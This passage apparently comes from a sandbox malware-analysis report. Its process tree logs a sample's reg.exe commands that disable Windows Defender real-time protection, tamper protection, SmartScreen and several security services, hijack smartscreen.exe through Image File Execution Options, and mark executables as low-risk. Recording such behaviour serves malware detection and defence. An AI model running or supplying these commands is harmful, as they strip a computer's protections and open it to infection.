                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:5400
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Virus and threat protection" /v "FilesBlockedNotificationDisabled" /t REG_DWORD /d "00000001" /f /reg:64
                                                                                    8⤵
                                                                                      PID:5820
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Virus and threat protection" /v "SummaryNotificationDisabled" /t REG_DWORD /d "00000001" /f /reg:64
                                                                                      8⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:1716
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRawWriteNotification /t REG_DWORD /d "1" /f /reg:64
                                                                                      8⤵
                                                                                      • Modifies Windows Defender Real-time Protection settings
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:4112
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d "1" /f /reg:64
                                                                                      8⤵
                                                                                      • Modifies Windows Defender Real-time Protection settings
                                                                                      PID:1424
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d "1" /f
                                                                                      8⤵
                                                                                      • Modifies Windows Defender Real-time Protection settings
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:5492
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f /reg:64
                                                                                      8⤵
                                                                                      • Modifies Windows Defender Real-time Protection settings
                                                                                      PID:3300
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                                                                      8⤵
                                                                                      • Modifies Windows Defender Real-time Protection settings
                                                                                      PID:5696
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /t REG_DWORD /d "1" /f /reg:64
                                                                                      8⤵
                                                                                      • Modifies Windows Defender Real-time Protection settings
                                                                                      PID:3756
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /t REG_DWORD /d "1" /f
                                                                                      8⤵
                                                                                      • Modifies Windows Defender Real-time Protection settings
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:5348
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScriptScanning /t REG_DWORD /d "1" /f /reg:64
                                                                                      8⤵
                                                                                      • Modifies Windows Defender Real-time Protection settings
                                                                                      PID:5528
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIntrusionPreventionSystem /t REG_DWORD /d "0" /f /reg:64
                                                                                      8⤵
                                                                                      • Modifies Windows Defender Real-time Protection settings
                                                                                      PID:2236
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableInformationProtectionControl /t REG_DWORD /d "0" /f /reg:64
                                                                                      8⤵
                                                                                      • Modifies Windows Defender Real-time Protection settings
                                                                                      PID:1216
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableArchiveScanning /t REG_DWORD /d "1" /f /reg:64
                                                                                      8⤵
                                                                                        PID:5284
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t reg_DWORD /d "1" /f /reg:64
                                                                                        8⤵
                                                                                        • Modifies Windows Defender Real-time Protection settings
                                                                                        PID:3480
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t reg_DWORD /d "1" /f
                                                                                        8⤵
                                                                                        • Modifies Windows Defender Real-time Protection settings
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:4088
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpynetReporting /t REG_DWORD /d "0" /f /reg:64
                                                                                        8⤵
                                                                                          PID:4268
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpynetReporting /t REG_DWORD /d "0" /f
                                                                                          8⤵
                                                                                            PID:3728
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d "2" /f /reg:64
                                                                                            8⤵
                                                                                              PID:4508
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d "2" /f
                                                                                              8⤵
                                                                                                PID:2956
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /t REG_DWORD /d "0" /f /reg:64
                                                                                                8⤵
                                                                                                  PID:1004
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\Controlled Folder Access" /v EnableControlledFolderAccess /t REG_DWORD /d "0" /f /reg:64
                                                                                                  8⤵
                                                                                                    PID:3752
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableRoutinelyTakingAction /t REG_DWORD /d "1" /f /reg:64
                                                                                                    8⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:3456
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableRoutinelyTakingAction /t REG_DWORD /d "1" /f
                                                                                                    8⤵
                                                                                                      PID:5300
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Scan" /v ScheduleDay /t REG_DWORD /d "8" /f /reg:64
                                                                                                      8⤵
                                                                                                        PID:660
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t reg_DWORD /d "1" /f /reg:64
                                                                                                        8⤵
                                                                                                        • Modifies Windows Defender Real-time Protection settings
                                                                                                        PID:4040
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t reg_DWORD /d "1" /f
                                                                                                        8⤵
                                                                                                        • Modifies Windows Defender Real-time Protection settings
                                                                                                        PID:6056
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f /reg:64
                                                                                                        8⤵
                                                                                                          PID:5676
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                                                                                          8⤵
                                                                                                            PID:5928
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableSpecialRunningModes" /t REG_DWORD /d "1" /f /reg:64
                                                                                                            8⤵
                                                                                                              PID:3944
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableSpecialRunningModes" /t REG_DWORD /d "1" /f
                                                                                                              8⤵
                                                                                                                PID:1588
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "ServiceKeepAlive" /t REG_DWORD /d "0" /f /reg:64
                                                                                                                8⤵
                                                                                                                  PID:3276
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "ServiceKeepAlive" /t REG_DWORD /d "0" /f
                                                                                                                  8⤵
                                                                                                                    PID:5500
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f /reg:64
                                                                                                                    8⤵
                                                                                                                      PID:2120
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                                                                                                                      8⤵
                                                                                                                        PID:1684
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d "1" /f /reg:64
                                                                                                                        8⤵
                                                                                                                        • Modifies Windows Defender DisableAntiSpyware settings
                                                                                                                        PID:5556
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        C:\Windows\System32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /v TamperProtection /t "REG_DWORD" /d "0" /f /reg:64
                                                                                                                        8⤵
                                                                                                                        • Modifies Windows Defender TamperProtection settings
                                                                                                                        PID:1620
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        C:\Windows\System32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /v TamperProtection /t "REG_DWORD" /d "0" /f
                                                                                                                        8⤵
                                                                                                                        • Modifies Windows Defender TamperProtection settings
                                                                                                                        PID:5468
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v DisableAntiSpyware /t REG_DWORD /d "4" /f /reg:64
                                                                                                                        8⤵
                                                                                                                        • Modifies security service
                                                                                                                        PID:4708
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d "4" /f /reg:64
                                                                                                                        8⤵
                                                                                                                          PID:4824
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v Start /t REG_DWORD /d "4" /f /reg:64
                                                                                                                          8⤵
                                                                                                                          • Modifies Security services
                                                                                                                          PID:1960
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\MsSecFlt" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                          8⤵
                                                                                                                            PID:4580
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                            8⤵
                                                                                                                            • Modifies Security services
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:4704
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                            8⤵
                                                                                                                              PID:4700
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\MDCoreSvc" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                              8⤵
                                                                                                                                PID:6108
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\MDCoreSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                8⤵
                                                                                                                                  PID:6004
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                                  8⤵
                                                                                                                                  • Modifies Security services
                                                                                                                                  PID:4460
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                  8⤵
                                                                                                                                  • Modifies Security services
                                                                                                                                  PID:4276
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                                  8⤵
                                                                                                                                  • Modifies Security services
                                                                                                                                  PID:232
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                                  8⤵
                                                                                                                                  • Modifies Security services
                                                                                                                                  PID:4712
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                  8⤵
                                                                                                                                  • Modifies Security services
                                                                                                                                  PID:1672
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                                  8⤵
                                                                                                                                  • Modifies Security services
                                                                                                                                  PID:5656
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                                  8⤵
                                                                                                                                  • Modifies Security services
                                                                                                                                  PID:6124
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                  8⤵
                                                                                                                                  • Modifies Security services
                                                                                                                                  PID:4448
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                                  8⤵
                                                                                                                                  • Modifies Security services
                                                                                                                                  PID:4436
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                  8⤵
                                                                                                                                  • Modifies Security services
                                                                                                                                  PID:4440
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                                  8⤵
                                                                                                                                  • Modifies Security services
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:1956
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                                  8⤵
                                                                                                                                  • Modifies Security services
                                                                                                                                  PID:1344
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                                  8⤵
                                                                                                                                  • Modifies security service
                                                                                                                                  PID:5172
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SgrmAgent" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                                  8⤵
                                                                                                                                    PID:1744
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SgrmBroker" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                                    8⤵
                                                                                                                                      PID:4492
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\SgrmBroker" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                                      8⤵
                                                                                                                                        PID:4360
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\webthreatdefsvc" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                                        8⤵
                                                                                                                                          PID:3832
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\webthreatdefusersvc" /v "Start" /t REG_DWORD /d "4" /f /reg:64
                                                                                                                                          8⤵
                                                                                                                                            PID:4468
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v DisableAntiSpyware /t REG_DWORD /d "4" /f
                                                                                                                                            8⤵
                                                                                                                                            • Modifies security service
                                                                                                                                            PID:2252
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d "4" /f
                                                                                                                                            8⤵
                                                                                                                                              PID:5980
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v Start /t REG_DWORD /d "4" /f
                                                                                                                                              8⤵
                                                                                                                                              • Modifies Security services
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              PID:4600
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\MsSecFlt" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                              8⤵
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              PID:5480
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                              8⤵
                                                                                                                                              • Modifies Security services
                                                                                                                                              PID:4324
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                              8⤵
                                                                                                                                                PID:4592
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                8⤵
                                                                                                                                                • Modifies Security services
                                                                                                                                                PID:5968
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                8⤵
                                                                                                                                                • Modifies Security services
                                                                                                                                                PID:5328
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                8⤵
                                                                                                                                                • Modifies Security services
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:1868
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                8⤵
                                                                                                                                                • Modifies Security services
                                                                                                                                                PID:5644
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                8⤵
                                                                                                                                                • Modifies security service
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:3036
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SgrmAgent" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                8⤵
                                                                                                                                                  PID:2020
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SgrmBroker" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                  8⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:2288
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  C:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Services\SgrmBroker" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                  8⤵
                                                                                                                                                    PID:3624
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\webthreatdefsvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                    8⤵
                                                                                                                                                      PID:2148
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\webthreatdefusersvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                      8⤵
                                                                                                                                                        PID:5836
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\ControlSet001\Services" /s /k "webthreatdefusersvc" /f 2>nul | find /i "webthreatdefusersvc"
                                                                                                                                                        8⤵
                                                                                                                                                          PID:2536
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            reg query "HKLM\SYSTEM\ControlSet001\Services" /s /k "webthreatdefusersvc" /f
                                                                                                                                                            9⤵
                                                                                                                                                              PID:2756
                                                                                                                                                            • C:\Windows\SysWOW64\find.exe
                                                                                                                                                              find /i "webthreatdefusersvc"
                                                                                                                                                              9⤵
                                                                                                                                                                PID:3604
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f /reg:64
                                                                                                                                                              8⤵
                                                                                                                                                                PID:6100
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smartscreen.exe" /v "Debugger" /t REG_SZ /d "%windir%\System32\taskkill.exe" /f /reg:64
                                                                                                                                                                8⤵
                                                                                                                                                                • Event Triggered Execution: Image File Execution Options Injection
                                                                                                                                                                PID:1752
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "6152" /f /reg:64
                                                                                                                                                                8⤵
                                                                                                                                                                  PID:2936
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f /reg:64
                                                                                                                                                                  8⤵
                                                                                                                                                                    PID:5568
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;" /f /reg:64
                                                                                                                                                                    8⤵
                                                                                                                                                                      PID:2612
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "ModRiskFileTypes" /t REG_SZ /d ".bat;.exe;.reg;.vbs;.chm;.msi;.js;.cmd" /f /reg:64
                                                                                                                                                                      8⤵
                                                                                                                                                                        PID:3448
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Edge\SmartScreenEnabled" /ve /t REG_DWORD /d "0" /f /reg:64
                                                                                                                                                                        8⤵
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        PID:3588
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Edge\SmartScreenEnabled" /ve /t REG_DWORD /d "0" /f
                                                                                                                                                                        8⤵
                                                                                                                                                                          PID:1440
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Edge\SmartScreenPuaEnabled" /ve /t REG_DWORD /d "0" /f /reg:64
                                                                                                                                                                          8⤵
                                                                                                                                                                            PID:1568
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            C:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Edge\SmartScreenPuaEnabled" /ve /t REG_DWORD /d "0" /f
                                                                                                                                                                            8⤵
                                                                                                                                                                              PID:2096
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              C:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f /reg:64
                                                                                                                                                                              8⤵
                                                                                                                                                                                PID:2424
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d "0" /f /reg:64
                                                                                                                                                                                8⤵
                                                                                                                                                                                  PID:964
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  C:\Windows\System32\reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControl" /t REG_DWORD /d "0" /f /reg:64
                                                                                                                                                                                  8⤵
                                                                                                                                                                                    PID:1500
